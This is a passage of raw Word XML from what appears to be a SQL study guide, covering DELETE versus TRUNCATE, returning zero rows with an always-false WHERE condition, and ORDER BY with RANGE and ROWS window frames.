            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="642846F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f no WHERE used)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="783675B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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F815A9" w:rsidRPr="00F815A9" w14:paraId="0F3A3C31" w14:textId="77777777" w:rsidTr="00F815A9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62F7288D"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Conditional deletion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EDBA2C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with WHERE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0AFFB7C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r>
      <w:tr w:rsidR="00F815A9" w:rsidRPr="00F815A9" w14:paraId="60595624" w14:textId="77777777" w:rsidTr="00F815A9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4823D0A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ollback possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21099BD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transaction)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08AC983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imited / No (depends on DB)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F815A9" w:rsidRPr="00F815A9" w14:paraId="096C4E13" w14:textId="77777777" w:rsidTr="00F815A9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E4A983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sets identity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EBD65F7"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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72FDB09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some RDBMS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F815A9" w:rsidRPr="00F815A9" w14:paraId="6F4FF943" w14:textId="77777777" w:rsidTr="00F815A9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AFBF1D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ogging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E789A45"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ull (per row)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03C31D8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Minimal (page-level)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F815A9" w:rsidRPr="00F815A9" w14:paraId="59D93E69" w14:textId="77777777" w:rsidTr="00F815A9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A1A74E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peed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14039B9C"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lower</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6975736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aster</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="35140C21" w14:textId="37A12984" w:rsidR="000938AB" w:rsidRDefault="00000000" w:rsidP="000938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3951FF">
          <v:rect id="_x0000_i3182" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="203123C4" w14:textId="5625C596" w:rsidR="00DD1028" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD1028" w:rsidP="00DD1028">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="749" w:name="_Toc197867963"/>
      <w:r w:rsidRPr="00DD1028">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>SQL Query - Get Zero records from table having n number of records</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="749"/>
    </w:p>
    <w:p w14:paraId="54F320FA" w14:textId="3C4325EB" w:rsidR="00DD1028" w:rsidRPr="00DD1028" w:rsidRDefault="00DD1028" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>
        </w:num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To get zero records from a table (i.e., return an empty result set) even though the table has N number of records, you can use a condition that is always false.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E44F562"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Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD1028">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Example SQL Queries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06866CEC"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1 = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0D55A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OR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109CB3AE"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FALSE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A5C7F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Both queries will return 0 rows, regardless of how many rows exist in the table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F63471"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Let me know if you want this behavior used inside a stored procedure or view.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E28EB9" w14:textId="77777777" w:rsidR="00DD1028" w:rsidRPr="00393B05" w:rsidRDefault="00000000" w:rsidP="00DD10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3AB4A7">
          <v:rect id="_x0000_i3183" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A319CBD" w14:textId="0FA43416" w:rsidR="003C0862" w:rsidRPr="00CE4B95" w:rsidRDefault="003C0862">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="750" w:name="_Toc197867964"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is ordered by and range in the database?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="750"/>
    </w:p>
    <w:p w14:paraId="6827BB96" w14:textId="32A1E20E" w:rsidR="00E6658E" w:rsidRPr="00393B05" w:rsidRDefault="00E6658E"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and RANGE in SQL — Explained</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5754473A"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853AB5">
          <v:rect id="_x0000_i3184" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="573D5ED3" w14:textId="45016031"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Clause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686BADE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05FC3EC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he ORDER BY clause is used to </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sort the result set</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> based on one or more columns in </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ascending (ASC)</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descending (DESC)</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3902394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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255C4DD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 FROM Employee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6122B39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name ASC;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B500E62"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1944825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all rows first by salary in descending order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744A35E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salaries are the same, then sorts those rows by name in ascending order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E02AC05"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ault Behavior:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278E123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no direction is specified, </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ASC (ascending)</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is assumed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105D65A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0EBE">
          <v:rect id="_x0000_i3185" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A118EC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Used with WINDOW FUNCTIONS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA07E8E"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2E23E1E2"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RANGE is used within a </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>window function's OVER() clause</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to define a set of row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xml:space="preserve"> around the current row.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319D5BD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often used with ORDER BY in </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>analytical functions</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like SUM(), AVG(), etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD91E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 Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3075B9B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SELECT </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F62D888"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E19A99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alary,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398B7A3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 xml:space="preserve">    SUM(salary) OVER (ORDER BY salary RANGE BETWEEN UNBOUNDED PRECEDING AND CURRENT ROW) AS running_total</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DD708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683269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 of the above:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7107E16B"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omputes a </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>running total</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of salaries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565FC39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For each row, the window includes all rows with salary </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>less than or equal</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the current row's salary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DFBCFE"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45276">
          <v:rect id="_x0000_i3186" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C623224"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3737"/>
        <w:gridCol w:w="3086"/>
      </w:tblGrid>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="2B1B90E5" w14:textId="77777777" w:rsidTr="00E6658E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E2A6F0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6CF38670"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ANGE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5579576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OWS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="23F188C0" w14:textId="77777777" w:rsidTr="00E6658E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B925FA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ased on</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="196D82C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lumn values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="193F1411"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ow position</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="57923021" w14:textId="77777777" w:rsidTr="00E6658E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0417E68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uplicates</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23F45690"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cludes all rows with equal value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FA993A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unts exact number of rows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="4A0BD2E8" w14:textId="77777777" w:rsidTr="00E6658E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E4D405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Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14A97DE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values with same salary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4550DBC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N previous rows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="42A6ECEA"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ample:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DBB6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OWS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFB293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OWS BETWEEN 2 PRECEDING AND CURRENT ROW)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2169092F" w14:textId="77777777" w:rsidR="00E6658E" w:rsidRPr="00393B05" w:rsidRDefault="00E6658E" w:rsidP="00393B05">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5592209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ANGE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FA57B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ANGE BETWEEN 1000 PRECEDING AND CURRENT ROW)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C03ED2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C3EA1">
          <v:rect id="_x0000_i3187" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAE040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7880"/>
      </w:tblGrid>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="69AC2CF1" w14:textId="77777777" w:rsidTr="00E6658E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37DD5AF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erm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41F8323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urpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="3776B0FC" w14:textId="77777777" w:rsidTr="00E6658E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D45112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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DAF41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rows by one or more columns</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="617C7A70" w14:textId="77777777" w:rsidTr="00E6658E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F707D0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ANGE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="797A3CD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Defines a </w:t>
            </w:r>
            <w:r w:rsidRPr="00393B05">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>window frame</w:t>
            </w:r>
            <w:r w:rsidRPr="00393B05">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> for window function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not physical rows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="771046F5" w14:textId="17C1988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3188" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="76581F84" w14:textId="4CA5B95E" w:rsidR="00191509" w:rsidRPr="00CE4B95" w:rsidRDefault="00191509">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="751" w:name="_Toc197867965"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r w:rsidR="0014246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4246D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>- S</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">econd </w:t>
      </w:r>
      <w:r w:rsidR="00A5453B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">ighest </w:t>
      </w:r>
